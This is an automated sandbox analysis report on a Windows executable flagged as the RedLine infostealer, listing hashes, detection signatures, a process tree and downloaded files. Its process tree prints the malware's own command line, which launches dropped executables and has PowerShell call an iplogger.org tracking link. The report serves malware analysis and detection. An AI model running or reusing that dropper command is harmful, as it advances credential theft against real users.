Analysis
- max time kernel: 151s
- max time network: 155s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 21-03-2021 10:45
Static task: static1
Behavioral task: behavioral1
  Sample: f5366963764901262499c8021333f986.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: f5366963764901262499c8021333f986.exe
  Resource: win10v20201028
General
- Target: f5366963764901262499c8021333f986.exe
- Size: 1.1MB
- MD5: f5366963764901262499c8021333f986
- SHA1: e57b794220e7a6184614ccd4a6ddcf99de7e0717
- SHA256: 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f
- SHA512: 84cde9fd4846e839fee7171546c76253c321af4bc619e2b0b4830077b9d966251e36217f60c6da6c31258770fbf71284a1896a7bc5b388c609ebf18be9c048d6
Malware Config
Signatures
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine Payload (3 IoCs)
  resource | yara_rule
  behavioral1/memory/1584-69-0x0000000000400000-0x0000000000428000-memory.dmp | family_redline
  behavioral1/memory/1584-70-0x0000000000421DFE-mapping.dmp | family_redline
  behavioral1/memory/1584-73-0x0000000000400000-0x0000000000428000-memory.dmp | family_redline
- Blocklisted process makes network request (2 IoCs)
  flow | pid | process
  7 | 1604 | powershell.exe
  9 | 1604 | powershell.exe
- Executes dropped EXE (5 IoCs)
  pid | process
  1144 | hello_C# (2).exe
  1752 | hello_C#.exe
  1720 | jayson.exe
  1472 | riv.exe
  1584 | jayson.exe
- Loads dropped DLL (7 IoCs)
  pid | process
  1096 | f5366963764901262499c8021333f986.exe
  1928 | cmd.exe
  1928 | cmd.exe
  1928 | cmd.exe
  1928 | cmd.exe
  1928 | cmd.exe
  1720 | jayson.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Legitimate hosting services abused for malware hosting/C2 (1 TTP)
- Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 1720 set thread context of 1584 | 1720 | jayson.exe | jayson.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid | process
  1604 | powershell.exe
  1604 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 1604 | powershell.exe
  Token: SeDebugPrivilege | 1584 | jayson.exe
- Suspicious use of WriteProcessMemory (33 IoCs; identical rows grouped, with the number of entries in the last column)
  description | pid | process | target process | entries
  PID 1096 wrote to memory of 1928 | 1096 | f5366963764901262499c8021333f986.exe | cmd.exe | 4
  PID 1928 wrote to memory of 1144 | 1928 | cmd.exe | hello_C# (2).exe | 4
  PID 1928 wrote to memory of 1752 | 1928 | cmd.exe | hello_C#.exe | 4
  PID 1928 wrote to memory of 1720 | 1928 | cmd.exe | jayson.exe | 4
  PID 1928 wrote to memory of 1472 | 1928 | cmd.exe | riv.exe | 4
  PID 1928 wrote to memory of 1604 | 1928 | cmd.exe | powershell.exe | 4
  PID 1720 wrote to memory of 1584 | 1720 | jayson.exe | jayson.exe | 9
Processes (tree; the bracketed number is the depth in the process tree)
- [1] C:\Users\Admin\AppData\Local\Temp\f5366963764901262499c8021333f986.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\f5366963764901262499c8021333f986.exe"
  PID: 1096
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: "cmd" /c start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & start "" "jayson.exe" & start "" "riv.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
    PID: 1928
    Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe
      Command line: "hello_C# (2).exe"
      PID: 1144
      Signatures: Executes dropped EXE
    - [3] C:\Users\Admin\AppData\Local\Temp\hello_C#.exe
      Command line: "hello_C#.exe"
      PID: 1752
      Signatures: Executes dropped EXE
    - [3] C:\Users\Admin\AppData\Local\Temp\jayson.exe
      Command line: "jayson.exe"
      PID: 1720
      Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
      - [4] C:\Users\Admin\AppData\Local\Temp\jayson.exe
        Command line: "{path}"
        PID: 1584
        Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
      PID: 1604
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Users\Admin\AppData\Local\Temp\riv.exe
      Command line: "riv.exe"
      PID: 1472
      Signatures: Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Downloads (16 entries in the report covering 4 distinct files; each file is listed once below with the number of times it appears)
- Listed 6 times
  MD5: d6b9f530e7e8ddebea8069a0d94ad38e
  SHA1: 28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
  SHA256: 3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
  SHA512: 2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
- Listed 5 times
  MD5: 68f70e9545a6dbeecd3e2eba38c197ca
  SHA1: 5d0fdc7452e3af1c4d7b145256888687e5fd2a72
  SHA256: a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
  SHA512: 99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
- Listed 4 times
  MD5: bd96d90751fd507c3af0edbe0d596ec4
  SHA1: eed0bb7626d328190c7de701c0071f9c4ad048ef
  SHA256: f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
  SHA512: 5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338
- Listed once
  MD5: 293165db1e46070410b4209519e67494
  SHA1: 777b96a4f74b6c34d43a4e7c7e656757d1c97f01
  SHA256: 49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
  SHA512: 97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19